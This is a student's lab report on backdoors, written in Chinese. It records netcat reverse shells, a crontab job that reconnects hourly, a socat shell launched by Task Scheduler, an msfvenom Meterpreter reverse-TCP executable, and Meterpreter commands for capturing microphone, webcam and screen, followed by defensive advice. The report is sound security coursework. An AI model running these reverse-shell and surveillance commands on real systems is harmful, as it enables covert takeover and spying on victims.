20191321駱毅Exp2後門原理與實踐
1.基礎問題回答
(1)例舉你能想到的一個後門進入到你係統中的可能方式?
通過釣魚網站之類的網站,將後門程式捆綁在使用者下載的安裝包裡,並對後門程式進行偽裝
(2)例舉你知道的後門如何啟動起來(win及linux)的方式?
Windows的定時任務,自啟動,kali中的crontab,或者偽裝成正常檔案誘使使用者點選
(3)Meterpreter有哪些給你映像深刻的功能?
能夠竊取被攻擊的計算機的螢幕,甚至能夠呼叫被攻擊者的麥克風和攝像頭
(4)如何發現自己有系統有沒有被安裝後門?
定時檢查工作管理員,檢視是否有異常的任務在執行,檢視自啟動列表中是否有異常的程式
2.實踐過程記錄
(一)使用netcat獲取主機操作Shell,啟動cron
kali獲取windows的shell
首先在Kali終端輸入
ip addr 檢視kali的ip地址
輸入
nc -l -p 1321 監聽1321埠
在Windows中執行下載的ncat.exe
輸入
ncat.exe 172.16.209.248 1321 -e cmd
Windows獲取kali的shell
首先在Windows終端輸入
ipconfig 檢視Windows的ip地址
輸入
ncat.exe -l -p 1321 監聽1321埠
在Windows中執行下載的ncat.exe
輸入
nc 172.16.209.248 1321 -e /bin/sh
在虛擬機器中啟動cron並在主機監聽
首先在虛擬機器上用crontab -e指令編輯一條定時任務,輸入2表示選擇vim編輯器
在最後一行新增22 **** nc 172.16.213.118 1321 -e /bin/sh
即在每個小時的第22分鐘反向連線Windows主機的1321埠
主機輸入ncat.exe -l -p 1321 監聽即可
(二)使用socat獲取主機操作Shell,任務計劃啟動
先了解socat的用法 man socat
在windows虛擬機器中開啟控制面板->管理工具->任務計劃程式,建立任務,填寫任務名稱後,新建一個觸發器:
在操作->程式或指令碼中選擇你的socat.exe檔案的路徑,在新增引數一欄填寫tcp-listen:1321 exec:cmd.exe,pty,stderr,這個命令的作用是把cmd.exe繫結到埠1321,同時把cmd.exe的stderr重定向到stdout上:
建立完成之後,按Windows+L快捷鍵鎖定計算機,再次開啟時,可以發現之前建立的任務已經開始執行
此時,在Kali環境下輸入指令socat - tcp:192.168.136.151:1321,這裡的第一個引數-代表標準的輸入輸出,第二個流連線到Windows主機的1321埠,此時可以發現已經成功獲得了一個cmd shell:
中途遇到了connection refused的問題,我始終沒有找到問題所在,重複安裝socat.exe程式解決了這個問題
使用MSF meterpreter生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell
輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.129 LPORT=5215 -f exe > 20145215_backdoor.exe生成後門程式
通過nc指令將生成的後門程式傳送到Windows主機上
在Kali上使用msfconsole指令進入msf控制檯,使用監聽模組,設定payload,設定反彈回連的IP和埠
開啟Windows上的後門程式,此時Kali上已經獲得了Windows主機的連線,並且得到了遠端控制的shell
使用MSF meterpreter生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
使用record_mic指令可以截獲一段音訊
使用webcam_snap指令可以使用攝像頭進行拍照
使用webcam stream指令可以使用攝像頭進行錄影
使用screenshot指令可以進行截圖:
在這過程中,webcam_snap失敗了,檢視原因發現是攝像頭沒開(我用的是win7虛擬機器)
附上截圖
3.實驗總結與體會
此次實驗讓我對於網路攻防更近一步,以前在網上所看到的黑客操作自己也在動手學會,當虛擬機器控制電腦捕獲資訊的時候成就感油然而生。
這也讓我明白了網路攻防的重要性,msf具備了截圖,錄音,錄影的功能,這個時候防火牆就顯得尤為重要,它能夠攔截大部分攻擊,
其次是要保證自己的ip地址的私密性,這三個實驗都需要知道對應的ip才能進行攻擊,所以提高電腦的安全性還是要從我們平常做起,
比如說可以經常關閉一些本機不用的埠或只允許指定的埠訪問,
其次要使用專殺木馬的軟體,為了有效地防範木馬後門,還要學會對程序進行操作,時時注意系統執行狀況,看看是否有一些不明程序正執行並
及時地將不明程序終止掉。